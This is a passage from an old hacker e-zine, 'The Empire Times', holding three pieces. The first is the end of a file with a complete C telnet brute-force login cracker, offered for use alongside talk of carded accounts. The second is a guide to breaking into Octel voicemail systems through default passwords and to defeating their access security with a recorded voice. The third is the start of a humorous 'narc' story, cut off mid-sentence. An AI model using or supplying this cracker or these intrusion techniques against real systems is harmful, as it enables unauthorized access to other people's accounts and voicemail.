|
|||
|
A Plain Hacking Good Time.
|
|||
|
------------------------------
|
|||
|
|
|||
|
Brute it away baby. You could also take that delphi account you just
|
|||
|
carded, finger a site, and brute it that away. Bruting works about 2% of the
|
|||
|
time now, but this script will brute for you.
|
|||
|
|
|||
|
|
|||
|
/*
|
|||
|
######################################
|
|||
|
# Unix telneting brute force hacker #
|
|||
|
######################################
|
|||
|
*/
|
|||
|
|
|||
|
#include <stdio.h>
|
|||
|
#include <sys/wait.h>
|
|||
|
#include <signal.h>
|
|||
|
|
|||
|
/*
|
|||
|
########################################
|
|||
|
# Set this according to the path and #
|
|||
|
# filename where telnet is located #
|
|||
|
########################################
|
|||
|
*/
|
|||
|
|
|||
|
#define TELNETPATH "/usr/ucb/telnet"
|
|||
|
|
|||
|
/*
|
|||
|
##############################################################
|
|||
|
# The Following are set to default on a SunOs login format. #
|
|||
|
# You may need to change these for other systems. #
|
|||
|
##############################################################
|
|||
|
*/
|
|||
|
|
|||
|
#define LOGINSTRING "login:"
|
|||
|
#define PASSSTRING "Password:"
|
|||
|
#define GOTONESTRING "Last login"
|
|||
|
|
|||
|
/*
|
|||
|
######################################################
|
|||
|
# You won't need to edit anything after this point #
|
|||
|
######################################################
|
|||
|
*/
|
|||
|
|
|||
|
|
|||
|
#define GETC(c) read(readfd,&(c),1) /* Functions to read and write pipe */
|
|||
|
#define PUTC(c) write(writefd,&(c),1)
|
|||
|
#define PUTS(s) write(writefd,(s),strlen(s))
|
|||
|
|
|||
|
char *HOST[80]; /* String: Holds connect to host on telnet */
|
|||
|
char DBUG = 0; /* Switch: for Debug/Background modes */
|
|||
|
char EOO = 0; /* Switch: Exit after 1st find */
|
|||
|
char *afilename[80]; /* String: filename to account list */
|
|||
|
char *pfilename[80]; /* String: Holds filename to password list */
|
|||
|
char *ofilename[80]; /* String: Holds filename to output file */
|
|||
|
char account[10]; /* Strings: Hold account/pw for attempts */
|
|||
|
char password[10];
|
|||
|
|
|||
|
FILE *accounts; /* File pointers */
|
|||
|
FILE *passwords;
|
|||
|
FILE *found;
|
|||
|
|
|||
|
char ch; /* General purpose */
|
|||
|
char buf[800];
|
|||
|
|
|||
|
int count;
|
|||
|
int p1[2], p2[2]; /* Streams for the process pipe connection */
|
|||
|
int writefd, readfd; /* Handles for the pipe */
|
|||
|
|
|||
|
/*
|
|||
|
###############################################################################
|
|||
|
# Handles the death of the telnet process due to a timeout on connection. #
|
|||
|
# Restarts a telnet process and reconnects to the host #
|
|||
|
###############################################################################
|
|||
|
*/
|
|||
|
|
|||
|
void *death()
|
|||
|
|
|||
|
{
|
|||
|
if (1 == 1) {
|
|||
|
|
|||
|
wait3(NULL, WNOHANG, NULL);
|
|||
|
signal(SIGCLD, death);
|
|||
|
switch (fork()) {
|
|||
|
|
|||
|
case 0:
|
|||
|
dup2(p2[0], 0);
|
|||
|
dup2(p1[1], 1);
|
|||
|
execl(TELNETPATH, "telnet", 0);
|
|||
|
printf("Exec Failed\n");
|
|||
|
|
|||
|
default:
|
|||
|
PUTS(HOST);
|
|||
|
return;
|
|||
|
}
|
|||
|
}
|
|||
|
wait3(NULL, WNOHANG, NULL);
|
|||
|
signal(SIGCLD, death);
|
|||
|
return;
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
###########################
|
|||
|
# Error exit routine/Help #
|
|||
|
###########################
|
|||
|
*/
|
|||
|
|
|||
|
void help(parg)
|
|||
|
|
|||
|
{
|
|||
|
printf("\nUsage: %s <address> -a<account list> -p<password list> -o<output>\n", parg);
|
|||
|
printf("Flags: -d (Debug/Run in foreground)\n");
|
|||
|
printf(" -1 Exit after first find\n\n");
|
|||
|
exit();
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
########
|
|||
|
# MAIN #
|
|||
|
########
|
|||
|
*/
|
|||
|
main(argc, argv)
|
|||
|
|
|||
|
int argc;
|
|||
|
char **argv;
|
|||
|
{
|
|||
|
if (argc == 1)
|
|||
|
help(argv[0]);
|
|||
|
strcpy(HOST, argv[1]);
|
|||
|
for (count = 2; count != argc; count++) {
|
|||
|
if (argv[count][0] != '-') {
|
|||
|
printf("\n:: Invalid Command Line ::\n");
|
|||
|
help(argv[0]);
|
|||
|
}
|
|||
|
ch = argv[count][1];
|
|||
|
switch (ch) {
|
|||
|
case 'a':
|
|||
|
if (!afilename[0])
|
|||
|
strcpy(afilename, argv[count] + 2);
|
|||
|
break;
|
|||
|
case 'p':
|
|||
|
if (!pfilename[0])
|
|||
|
strcpy(pfilename, argv[count] + 2);
|
|||
|
break;
|
|||
|
case 'o':
|
|||
|
if (!ofilename[0])
|
|||
|
strcpy(ofilename, argv[count] + 2);
|
|||
|
break;
|
|||
|
case 'd':
|
|||
|
DBUG = 1;
|
|||
|
break;
|
|||
|
case '1':
|
|||
|
EOO = 1;
|
|||
|
break;
|
|||
|
default:
|
|||
|
printf("\n:: -%c: Unknown option ::\n\n", ch);
|
|||
|
help(argv[0]);
|
|||
|
}
|
|||
|
}
|
|||
|
while (!afilename[0]) {
|
|||
|
printf("AccountList: ");
|
|||
|
gets(afilename);
|
|||
|
}
|
|||
|
while (!pfilename[0]) {
|
|||
|
printf("PasswrdList: ");
|
|||
|
gets(pfilename);
|
|||
|
}
|
|||
|
while (!ofilename[0]) {
|
|||
|
printf("Outfile: ");
|
|||
|
gets(ofilename);
|
|||
|
}
|
|||
|
printf("\nHOST: %s", HOST);
|
|||
|
printf("\nAccountFile: %s", afilename);
|
|||
|
printf("\nPasswrdFile: %s", pfilename);
|
|||
|
printf("\nOutfile: %s", ofilename);
|
|||
|
printf("\nDebug: ");
|
|||
|
if (DBUG == 0)
|
|||
|
printf("Off");
|
|||
|
else
|
|||
|
printf("On");
|
|||
|
printf("\n");
|
|||
|
strcpy(buf, HOST);
|
|||
|
strcpy(HOST, "open ");
|
|||
|
strcat(HOST, buf);
|
|||
|
strcat(HOST, "\n");
|
|||
|
printf(HOST);
|
|||
|
if (DBUG == 0) {
|
|||
|
if (fork()) {
|
|||
|
printf("\nRunning in the background. ");
|
|||
|
exit();
|
|||
|
}
|
|||
|
printf("PID: %d\n", getpid());
|
|||
|
}
|
|||
|
signal(SIGCLD, death); /* Execute death function when child dies */
|
|||
|
|
|||
|
/*
|
|||
|
#######################################
|
|||
|
# Set up pipes and start telnet child #
|
|||
|
#######################################
|
|||
|
*/
|
|||
|
if (pipe(p2) == -1 || pipe(p1) == -1) {
|
|||
|
printf("Error making pipes.=n");
|
|||
|
return;
|
|||
|
}
|
|||
|
readfd = p1[0]; /* read from p1 */
|
|||
|
writefd = p2[1]; /* write to p2 */
|
|||
|
switch (fork()) {
|
|||
|
case -1 :
|
|||
|
printf("Couldnt fork off a child\n");
|
|||
|
return;
|
|||
|
case 0 : /* the child */
|
|||
|
dup2(p2[0], 0); /* read from p2 */
|
|||
|
dup2(p1[1], 1); /* write to p1 */
|
|||
|
execl(TELNETPATH, "telnet", 0);
|
|||
|
printf("Exec failed.\n");
|
|||
|
exit(-1);
|
|||
|
default: /* parent */
|
|||
|
break;
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
##############
|
|||
|
# Open files #
|
|||
|
##############
|
|||
|
*/
|
|||
|
if ((accounts = fopen(afilename, "r")) == NULL) {
|
|||
|
printf("ERROR: AccountFile <%s> Not found.\n", afilename);
|
|||
|
exit();
|
|||
|
}
|
|||
|
if ((passwords = fopen(pfilename, "r")) == NULL) {
|
|||
|
printf("ERROR: PasswrdFile <%s> Not Found.\n", pfilename);
|
|||
|
exit();
|
|||
|
}
|
|||
|
found = fopen(ofilename, "w+");
|
|||
|
fprintf(found, "Trying Host: %s\n\n", buf);
|
|||
|
fflush(found);
|
|||
|
PUTS(HOST); /* Send open <host> to telnet */
|
|||
|
|
|||
|
while (1) { /* Loop to capture to buf */
|
|||
|
if (GETC(ch) > 0) {
|
|||
|
if (DBUG == 1)
|
|||
|
putchar(ch);
|
|||
|
buf[count++] = ch;
|
|||
|
}
|
|||
|
|
|||
|
if (ch == 10)
|
|||
|
count = 0;
|
|||
|
|
|||
|
if (strstr(buf, GOTONESTRING) != NULL) { /* Check for good account */
|
|||
|
count = 0;
|
|||
|
fprintf(found, "Account: %sPassword: %s\n", account, password);
|
|||
|
fflush(found);
|
|||
|
printf("Got one! Account: %sPassword:%s\n", account, password);
|
|||
|
if (EOO == 1)
|
|||
|
exit();
|
|||
|
}
|
|||
|
if (strstr(buf, LOGINSTRING) != NULL) { /* Check for login prompt */
|
|||
|
count = 0;
|
|||
|
strcpy(buf, "XXXXXXXX");
|
|||
|
if (ftell(passwords) == 0) {
|
|||
|
if (fscanf(accounts, "%s", account) == EOF) {
|
|||
|
printf("End of accounts\n");
|
|||
|
break;
|
|||
|
}
|
|||
|
strcat(account, "\n");
|
|||
|
}
|
|||
|
|
|||
|
if (DBUG == 1)
|
|||
|
puts(account);
|
|||
|
PUTS(account);
|
|||
|
}
|
|||
|
|
|||
|
if (strstr(buf, PASSSTRING) != NULL) { /* Check for passwd prompt */
|
|||
|
count = 0;
|
|||
|
strcpy(buf, "XXXXXX");
|
|||
|
if (fscanf(passwords, "%s", password) == EOF) {
|
|||
|
strcpy(password, account);
|
|||
|
rewind(passwords);
|
|||
|
}
|
|||
|
else
|
|||
|
strcat(password, "\n");
|
|||
|
if (DBUG == 1)
|
|||
|
puts(password);
|
|||
|
PUTS(password);
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
Sites That give you shell accounts for free.
|
|||
|
-----------------------------------------------
|
|||
|
|
|||
|
These are the only ones I know of offhand that you can telnet to and get free
|
|||
|
accounts.
|
|||
|
|
|||
|
axposf.pa.dec.com login: axpguest pass: <enter>
|
|||
|
cyberspace.org
|
|||
|
cyberspace.net
|
|||
|
cyberspace.com
|
|||
|
cybernet.cse.fau.edu (not shell, but has alot of other nice things.)
|
|||
|
cris.com
|
|||
|
delphi.com (well, you know, that 5 hours of free internet deal.)
|
|||
|
nyx.cs.du.edu login: new
|
|||
|
hermes.merit.edu login: um-m-net
|
|||
|
m-net.ann-arbor.mi.us login: newuser
|
|||
|
|
|||
|
|
|||
|
If anyone wants to update, or make this t-phile more informational than it
|
|||
|
already is, email roach@tmok.res.wpi.edu.
|
|||
|
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Volume 2, Issue 4, File 4 of 8
|
|||
|
The Octel VMB System
|
|||
|
by Da TelcoPimp
|
|||
|
|
|||
|
++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++
|
|||
|
|| ||
|
|||
|
|| /--------/ /--------/ /-------------/ /----------/ /-/ ||
|
|||
|
|| / /----/ / / /---/ / /-----+ +-----/ / /----/___/ / / ||
|
|||
|
|| / / / / / / /__/ / / / +---/ / / ||
|
|||
|
|| / / / / / / / / / +---/ / / ||
|
|||
|
|| / /____/ / / /___/---/ / / / /____/---/ / /____/---/ ||
|
|||
|
|| /________/ /_________/ /_/ /__________/ /__________/ ||
|
|||
|
|| ||
|
|||
|
|| k|LLa ak-aSKi by Shadowdancer da TelC()PiMP ||
|
|||
|
++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++
|
|||
|
|
|||
|
|
|||
|
Octel is a type of VMB system, like Meridian Mail or Audix or whatever. But
|
|||
|
Octel is not well known and I have recently been abusing these systems in my
|
|||
|
area. There is one thing that I have noticed about these systems, they have
|
|||
|
very good security. All this inpho was gotten from Octel Voice Information
|
|||
|
Processing manual Release 3.0, a woman who works for Northern Telecom and
|
|||
|
playing around on systems. So let this voyage into the world of the Octel VMB
|
|||
|
system begin. Ignore all spelling errors, I cant spel worth shit. Format
|
|||
|
for this file is: each section that begins with the # symbol means that
|
|||
|
that is one of the options from the Main menu, and everything under that
|
|||
|
will take you down levels..
|
|||
|
|
|||
|
|
|||
|
Dialups:
|
|||
|
========
|
|||
|
|
|||
|
There are two dialups for this system. There is the backdoor, the Octel
|
|||
|
System number, and then there is the front door. The Backdoor can be used to
|
|||
|
leave messages and also login to the vmb. This also goes for the front door
|
|||
|
as well. The differnece between the front door and the backdoor is the
|
|||
|
greeting. The front door is where you get the personalized greeting. The
|
|||
|
backdoor will pick up and say something to the effect of enter the mailbox
|
|||
|
number you wish to leave a message to or press # to indicate that you have
|
|||
|
a mailbox on this system.
|
|||
|
|
|||
|
Hacking:
|
|||
|
========
|
|||
|
|
|||
|
There is really not much to this part. I have encountered an octel system
|
|||
|
backdoor where the box number was the same as the password. I have also
|
|||
|
encountered a system where the password was the whole telephone number plus a
|
|||
|
1 before it such as the box number was 1234 and the password was 1(pre)1234.
|
|||
|
These are all just basic defaults but they are what I have encountered more
|
|||
|
frequently.
|
|||
|
|
|||
|
|
|||
|
What to do after Logging in:
|
|||
|
============================
|
|||
|
|
|||
|
After you have logged in, before you are brought up to the main menu, you
|
|||
|
may be given some messages about different things maybe a broadcast message
|
|||
|
from your sysadmin or notification of automatically deleted messages etc.
|
|||
|
|
|||
|
Here is a list of options you can use at the main menu:
|
|||
|
|
|||
|
#1. Message Review
|
|||
|
------------------
|
|||
|
|
|||
|
11: To hear new messages.
|
|||
|
This option plays all new messages since the last session.
|
|||
|
|
|||
|
1: To review all messages.
|
|||
|
This allows you to play all messages in your mailbox, in the order
|
|||
|
recieved.
|
|||
|
|
|||
|
4: Replay.
|
|||
|
After listening to a message you are able to hit 4 and replay that
|
|||
|
last message. Commands used during playback will be listed at the
|
|||
|
end of this section.
|
|||
|
|
|||
|
5: Get Envelope information.
|
|||
|
Envelope iformation basically gives you the specs on a message. It
|
|||
|
will tell you whether it came from someone who has a mailbox on that
|
|||
|
system or whether it came from and outside caller. It will tell you
|
|||
|
the date & time sent, how long it is and if the message is marked as
|
|||
|
private, urgent or both.
|
|||
|
|
|||
|
6: Send a copy.
|
|||
|
Press 6 and then you will be prompted to make a recording of comments
|
|||
|
for the message so that the person the message is being forwarded to
|
|||
|
knows that it is a forwarded message from you. After recording the
|
|||
|
comments press #. If you would like to review your comments press 1.
|
|||
|
Now you enter the mailbox or if you don't know that press # to dial
|
|||
|
by name.
|
|||
|
|
|||
|
7: Erase.
|
|||
|
Just what it says. It erases the message after you listen to the
|
|||
|
message.
|
|||
|
|
|||
|
8: Reply.
|
|||
|
After you press 8 record your reply and then press # to tell the
|
|||
|
system you are done recording and then press # again to send. You
|
|||
|
can use record/edit controls during your reply. These will be
|
|||
|
covered later in the text.
|
|||
|
|
|||
|
9: Save.
|
|||
|
Just as it says. This option archives your messages.
|
|||
|
|
|||
|
#: Skip a message.
|
|||
|
While you are listening to the new messages you can press # to skip
|
|||
|
them but after you listen to the new messages it plays your skipped
|
|||
|
messages over and then your archived messages.
|
|||
|
|
|||
|
##: Skip to archived messages.
|
|||
|
If you are listening to the new messages and you want to skip to the
|
|||
|
archived messages just hit ## and you will be taken to them.
|
|||
|
|
|||
|
*: Cancel review of messages.
|
|||
|
This option cancels message review and takes you back to the main
|
|||
|
menu.
|
|||
|
|
|||
|
Commands used during playback of messages
|
|||
|
-----------------------------------------
|
|||
|
|
|||
|
1: Rewinds message 10 seconds.
|
|||
|
|
|||
|
11: Rewinds to the begining of the message.
|
|||
|
|
|||
|
2: Pause. To unpause press 2 again.
|
|||
|
|
|||
|
3: Fast-forwards message 10 seconds.
|
|||
|
|
|||
|
33: Fast-forwards to the end of the message.
|
|||
|
|
|||
|
4: Plays the message slower.
|
|||
|
|
|||
|
5: Gives envelope information.
|
|||
|
|
|||
|
6: Plays the message faster.
|
|||
|
|
|||
|
8: Levels volume to normal level.
|
|||
|
|
|||
|
9: Increases volume.
|
|||
|
|
|||
|
#2. Sending messages to other subscribers on the system
|
|||
|
-------------------------------------------------------
|
|||
|
|
|||
|
This function of the vmb is quite useful to the actual users of the system.
|
|||
|
Once someone has recieved there messages and read them etc. They can then
|
|||
|
send a message to someother person on that same system without having to dial
|
|||
|
their front door. Here are the options that are used during the recording
|
|||
|
and after the recording of the message.
|
|||
|
|
|||
|
#: Stop recording once you are satisfied with the message.
|
|||
|
|
|||
|
1: Replay your message.
|
|||
|
|
|||
|
*: Re-record your message if you are not satisfied with it.
|
|||
|
When re-recording you can re-record the whole message or just part
|
|||
|
of it. Use the Recording controls which will be listed later on
|
|||
|
in the text. (NOTE If you are leaving a long message the system
|
|||
|
notify you with two beeps that tell you your time is almost up.)
|
|||
|
|
|||
|
Once you have finished recording your message you have the choice of
|
|||
|
re-recording the message or delivering it. There are several ways of
|
|||
|
selecting a destination. 1) box number. 2) subscribers name. 3) group
|
|||
|
or personal distrubution list. 4) a guest or home mailbox number. (NOTE
|
|||
|
Later on in the text we will discuss how to create distribution lists and
|
|||
|
guest and home mailboxes.) When you are going to give the name of the
|
|||
|
person, instead of the mailbox number, here is the format for entering in
|
|||
|
the name -- last, first.
|
|||
|
0=0
|
|||
|
1=1
|
|||
|
2=2,a,b, or c
|
|||
|
3=3,d,e, or f
|
|||
|
4=4,g,h, or i
|
|||
|
5=5,j,k, or l
|
|||
|
6=6,m,n, or o
|
|||
|
7=7,p,q,r, or s
|
|||
|
8=8,t,u, or v
|
|||
|
9=9,w,x,y, or z
|
|||
|
|
|||
|
For instance, I was on the same system as you, you could send it to
|
|||
|
PiMP,Telco = 746783526
|
|||
|
|
|||
|
You can mark the messages as either urgentor private. After you enter the
|
|||
|
destination and before you send the message is when you can mark the message.
|
|||
|
You can always cancel the the option by pressing the option number a second
|
|||
|
time.
|
|||
|
|
|||
|
1: Private.
|
|||
|
|
|||
|
2: Urgent.
|
|||
|
|
|||
|
If you select message conformation you will presented with two choices.
|
|||
|
conformation of receipt and notification of non-receipt. Conformation of
|
|||
|
receipt is a system generated message which is sent to you after the person
|
|||
|
has read your message. Notification of non-receipt is a system generated
|
|||
|
message that tells you that the subscriber has not listened to your message
|
|||
|
within a certain time frame.
|
|||
|
|
|||
|
1: Conformation of receipt.
|
|||
|
|
|||
|
2: Notification of non-receipt.
|
|||
|
|
|||
|
If you wanted to you could give the system a certain time to deliver the
|
|||
|
message. This function is known as Future Delivery.
|
|||
|
|
|||
|
4: Future delivery.
|
|||
|
|
|||
|
After selecting this option you will be prompted to enter a date. You can
|
|||
|
either enter the actual date or if the message is to be delivered within the
|
|||
|
week you can specify the day of the week.
|
|||
|
|
|||
|
1: Specify the date.
|
|||
|
-Select the month. Jan.= 1 and Sept.= 9.
|
|||
|
-Select the date. Between 1 and 31.
|
|||
|
-Set the hour and minutes. 7:00 = 700 and 12:30 = 1230.
|
|||
|
-Select 1 for a.m. or 2 for p.m.
|
|||
|
|
|||
|
2: Specify the day of the week.
|
|||
|
-Enter the first two letter of the day, using the chart above that
|
|||
|
was used to enter in the name of the person on the system.
|
|||
|
Sun.= 78 and Fri.= 37.
|
|||
|
-Select the hour and minutes using the same format above.
|
|||
|
-Select the time of day, a.m. or p.m., using the format above.
|
|||
|
|
|||
|
After selecting all of the options and getting everything squared away, you
|
|||
|
are now ready to send the message. Press # to do this. After this enter *
|
|||
|
to go back to the main menu.
|
|||
|
|
|||
|
Recording controls
|
|||
|
------------------
|
|||
|
|
|||
|
Recording controls are basically identical to playback
|
|||
|
controls used while listening to messages. There are only
|
|||
|
a few commands that are different.
|
|||
|
|
|||
|
5: Resume the recording of a message.
|
|||
|
|
|||
|
1: Edit message.
|
|||
|
|
|||
|
11: Listen to what has been recorded.
|
|||
|
|
|||
|
2: Pause. Then press 5 to re-record over the undesired part
|
|||
|
of the message.
|
|||
|
|
|||
|
#3. Check Receipt
|
|||
|
-----------------
|
|||
|
|
|||
|
After you have entered this section from the main menu by pressing 3 you
|
|||
|
will be asked the identify the subscriber's mailbox number or enter in their
|
|||
|
name. All this option does is tell you whether or not the person you sent
|
|||
|
mail to has listened to your mail or not. If they have not listened to your
|
|||
|
mail all the way you will not get the receipt. The system will playback
|
|||
|
every message the subscriber has not listened to. To skip the messages you
|
|||
|
can press # or press * to cancel the Check Receipt.
|
|||
|
|
|||
|
#4. Personal Options
|
|||
|
--------------------
|
|||
|
|
|||
|
Under this section in the main menu there are 6 options you can choose from.
|
|||
|
1) Notification On/Off. 2) Administrative options. 3) Greetings. 4)
|
|||
|
Notification schedule. 5) Mailbox forwarding. & 6)Security Options. (g00d13)
|
|||
|
There are many levels of menus to this part of the main menu. But don't
|
|||
|
worry Jane Octel will talk you throught all of the steps...:)
|
|||
|
|
|||
|
1: Notification On/Off.
|
|||
|
This option basically sets whether system messages are repeated or
|
|||
|
not. 1 = On, 2 = Off.
|
|||
|
|
|||
|
2: Administrative options. (Under this level you have many many choices)
|
|||
|
|
|||
|
1: Passwords.
|
|||
|
|
|||
|
1: Personal Password.
|
|||
|
Your personal password can be up to 15 digits long. Your
|
|||
|
sysadmin set what is the minimum length required. Do not forget
|
|||
|
your password because then the sysadmin is forced to kill that
|
|||
|
mailbox and start you up a new one. The sysadmin will not be a
|
|||
|
happy camper. But then again sysadmins can eat a dick right?
|
|||
|
|
|||
|
2: Home Password.
|
|||
|
This is just some password you can give to members in your
|
|||
|
family. This just lets them send and receive mail like a guest.
|
|||
|
|
|||
|
3&4: Guest Password.
|
|||
|
This is one of the coolest options of all. This is basically
|
|||
|
a mailbox within a mailbox. You designate a password to one of
|
|||
|
your friends and he can leave messages to you and you can leave
|
|||
|
messages to him. But other users on the system cannot send the
|
|||
|
guest mail.
|
|||
|
|
|||
|
5: Security Password.
|
|||
|
This allows someone the option of getting the envelope
|
|||
|
information for the messages in your mailbox.
|
|||
|
|
|||
|
2: Group Lists (NOTE You can have a maximum of 15 lists with a maximum
|
|||
|
of 25 mailboxes).
|
|||
|
|
|||
|
1: Create list.
|
|||
|
-Give a two digit number for the list you want to create(from
|
|||
|
11 to 25).
|
|||
|
-Record the name for the list like "Uhh cool asswipes".
|
|||
|
-Enter either the mailbox number or the name of the people you
|
|||
|
want on the list.
|
|||
|
-To review all the names on the list press 1.
|
|||
|
-To exit and save the list press *.
|
|||
|
|
|||
|
When you want to send a message to a distribution list, enter in the list
|
|||
|
number when you are prompted to enter in the destination after recording the
|
|||
|
message etc.
|
|||
|
|
|||
|
2: Edit existing lists.
|
|||
|
|
|||
|
3: Delete existing lists.
|
|||
|
|
|||
|
4: Review or rename lists.
|
|||
|
|
|||
|
3: Prompt levels.
|
|||
|
These are the message prompts. It is like setting up menus on
|
|||
|
a bbs. You can choose novice, skilled, expert. This is not
|
|||
|
unlike setting up menus to your liking.
|
|||
|
|
|||
|
1: Standard prompts.
|
|||
|
These prompts are your basic prompts wich go over basic options
|
|||
|
such as sending mail etc.
|
|||
|
|
|||
|
2: Extended prompts.
|
|||
|
This prompt gives thorough explanations of commands and prompts
|
|||
|
you for use of all features.
|
|||
|
|
|||
|
3: Rapid prompts.
|
|||
|
This prompts cover all features but do not give thorough details
|
|||
|
and explanations.
|
|||
|
|
|||
|
4: Date and Time playback.
|
|||
|
This option tells you the time the message was recieved. You
|
|||
|
can turn this on by hitting 1 for on or 2 for off.
|
|||
|
|
|||
|
3: Greetings.
|
|||
|
|
|||
|
1: Personal greeting.
|
|||
|
This is the greeting you get once you have called up the front
|
|||
|
door or you have been transfered to that vmb. It is basically
|
|||
|
the same for almost all vmbs. You enter in a message like "Uhh
|
|||
|
this is Da TelcoPiMP, leave a fucking message after the beep!!"
|
|||
|
You can also choose a standard greeting wich is the Jane Octel
|
|||
|
voice saying that so and so is not in right now.
|
|||
|
|
|||
|
2: Extended absence greeting.
|
|||
|
This greeting just says that you are out for a lengthy period
|
|||
|
of time and won't be checking messages frequently. If the
|
|||
|
Message block option is on when the extended absence greeting
|
|||
|
is on your mailbox will not except messages except for messages
|
|||
|
from the sysadmin.
|
|||
|
|
|||
|
3: Name recording.
|
|||
|
This is a recording of your name which is used to confirm
|
|||
|
mailboxes when someone has entered in the number of your mailbox.
|
|||
|
It is also used with the standard greeting.
|
|||
|
|
|||
|
4: Notification schedule.
|
|||
|
This function allows your mailbox to call you at certain times (the
|
|||
|
times you setup) give you messages.
|
|||
|
-Select 1 for first schedule 2 for second schedule or 3 for temporary
|
|||
|
schedule.
|
|||
|
-Enter the telephone you want the system to call you at.
|
|||
|
-You will be asked to set up a start/stop time for the outcall
|
|||
|
notification from your mailbox. You can specify whether it applys
|
|||
|
to weekdays, weekends or both. Enter in the time using the same
|
|||
|
format as the earlier commands that require you to enter in the
|
|||
|
time.
|
|||
|
-Select the type of message that activates the notification. 1 = All,
|
|||
|
2 = Urgent and 3 = Group List.
|
|||
|
-Select how soon you want the system to call you after it receives a
|
|||
|
new message. 1 = Hour, 2 = Hours, 3 = 4 hours, 4 = 1 day, 5 =
|
|||
|
immediately and 6 = Never.
|
|||
|
-After all of this hassle you can confirm your entries or listen
|
|||
|
again. 1 = Confirm and 2 = Listen again.
|
|||
|
|
|||
|
5: Mailbox forwarding. (NOTE To have this option work you must have
|
|||
|
another mailbox created by the sysadmin, for the forwarded messages.
|
|||
|
Call up the system where the mailbox has been created for you and set it
|
|||
|
up.)
|
|||
|
|
|||
|
1: Establish or change the forwarding destination.
|
|||
|
Enter the network node address? and the forwarding destination
|
|||
|
mailbox number.
|
|||
|
|
|||
|
2: Cancel mailbox forwarding.
|
|||
|
|
|||
|
#: Confirmation.
|
|||
|
|
|||
|
6: Security options. (huhuhuhuh k00l)
|
|||
|
|
|||
|
1: Turn on access sekurity. (Record your name and the time.)
|
|||
|
|
|||
|
2: Turn off access sekurity.
|
|||
|
|
|||
|
Ok alittle inpho on this option. Once access security is on you are asked
|
|||
|
to record your name and time. This is so that the next time you login to
|
|||
|
your vmb you will hear "The last mailbox access was by <your name> at <time
|
|||
|
of entry>." So the next time you login to the vmb you will hear that message
|
|||
|
if you recorded the inpho at the begining of the last login. If you didn't
|
|||
|
record any inpho you will hear silence. Ok say you break into a system and
|
|||
|
this option is on. You will have to record that inpho. But the thing is you
|
|||
|
don't know if the person recorded inpho the last time they accessed their vmb.
|
|||
|
Therefore you are screwed. AHAH. Solution. Login. Record the inpho. Then
|
|||
|
you will hear whether or not they recorded any inpho last time they were on.
|
|||
|
Grab your cool crystal clear sounding tape recorder and record their inpho
|
|||
|
as they give it. And then login to the vmb again but this time playback the
|
|||
|
recording. It may work it may not. It all depends on the user of the system.
|
|||
|
|
|||
|
|
|||
|
Conclusion:
|
|||
|
-----------
|
|||
|
|
|||
|
This phile gives you most of the inphormation you need to mess with an OCTEL
|
|||
|
VMB once you are inside. I didn't give any elite inpho like how to dialout or
|
|||
|
anything you have to find that out yourself. Also you can dial through an
|
|||
|
attendant. This system can be used to set up 800 meetme's (so can Meridian)
|
|||
|
etc. This system is just as good as Meridian Mail maybe even better oh well.
|
|||
|
|
|||
|
Some cool inpho.
|
|||
|
|
|||
|
Octel Communications Corporations
|
|||
|
890 Tasman Drive
|
|||
|
Milpitas, California USA 95035-7439
|
|||
|
(408)/321-2000
|
|||
|
|
|||
|
greets:
|
|||
|
-------
|
|||
|
|
|||
|
armitage: this shit g0es to y00r d0m3.
|
|||
|
dr. freeze: y0y0y0y0 Dr. Fr33z3 in da hauz.
|
|||
|
manowar: uh Hello this is Black Menstraul and I'd like the #5ESS dialups for
|
|||
|
my area so I can take over Bell Atlantic.
|
|||
|
chaos: gimmie root on your system d00d.
|
|||
|
r0ach: ypsnarf them passwords.
|
|||
|
every_other_mother_fucka_i_didn't_mention: shouts go out to all yall mofo's.
|
|||
|
|
|||
|
L8R
|
|||
|
Shadowdancer Da TelcoPimp
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Volume 2, Issue 4, File 5 of 8
|
|||
|
My Life as a Narc...
|
|||
|
by Noelle
|
|||
|
|
|||
|
Introduction
|
|||
|
|
|||
|
|
|||
|
It all started one bright sunny May morning. May 30th, 1993, to
|
|||
|
be exact.
|
|||
|
|
|||
|
There I was, sitting at my computer terminal innocently playing
|
|||
|
TrekMuse and TinyTim Mush. Little did I know how much trouble I was about
|
|||
|
to get into.
|
|||
|
|
|||
|
I saw something in the reflection of my X-terminal, so I turned
|
|||
|
around. Standing behind me was a Fed! My heart stopped for a moment, then
|
|||
|
began to pound furiously. "Hello?"
|
|||
|
|
|||
|
The man was tall, about 6', with dark brown hair and piercing blue
|
|||
|
eyes. "Agent Snorkel, Air Force OSI. Can I speak with you for a few
|
|||
|
moments?" I noticed his reflective sunglasses and long black trench coat,
|
|||
|
and had memories of something written by Tom Clancy.
|
|||
|
|
|||
|
"Uh..." I looked around for my boss, "Sure. I guess." My boss was
|
|||
|
probably off reading another one of his molecular biology textbooks.
|
|||
|
|
|||
|
We walked out to the center courtyard of the Pentagon. It was a
|
|||
|
windy day, so Agent Snorkel had to keep brushing his hair out of his eyes.
|
|||
|
We sat down on one of the benches and he pulled out his badge. "We're
|
|||
|
required by law to show you this." Before I could even read the name on the
|
|||
|
gold blob, he shoved it back inside his pocket. Opening up his dayplanner,
|
|||
|
he proceeded to ask me several questions about the internet and cyberspacial
|
|||
|
adventures.
|
|||
|
|
|||
|
I responded with enthusiasm. "MUSH programming is a great way to
|
|||
|
learn C code!" He looked at me with an expression that said, "C code?" and
|
|||
|
I knew I was safe. "Yes, I learn so much more about how to do my job by
|
|||
|
playing these games. If only EVERYONE had this opportunity!" Agent Snorkel
|
|||
|
nodded and made a few chicken scratches on a pad of paper.
|
|||
|
|
|||
|
My mistake was in giving the guy too much information. I could see
|
|||
|
a glimmer in his eyes when I said, "Oh yeah...these guys would do anything
|
|||
|
to impress a girl on the net. They've told me about all SORTS of things
|
|||
|
they've done which are probably against the law. Hacking into a computer is
|
|||
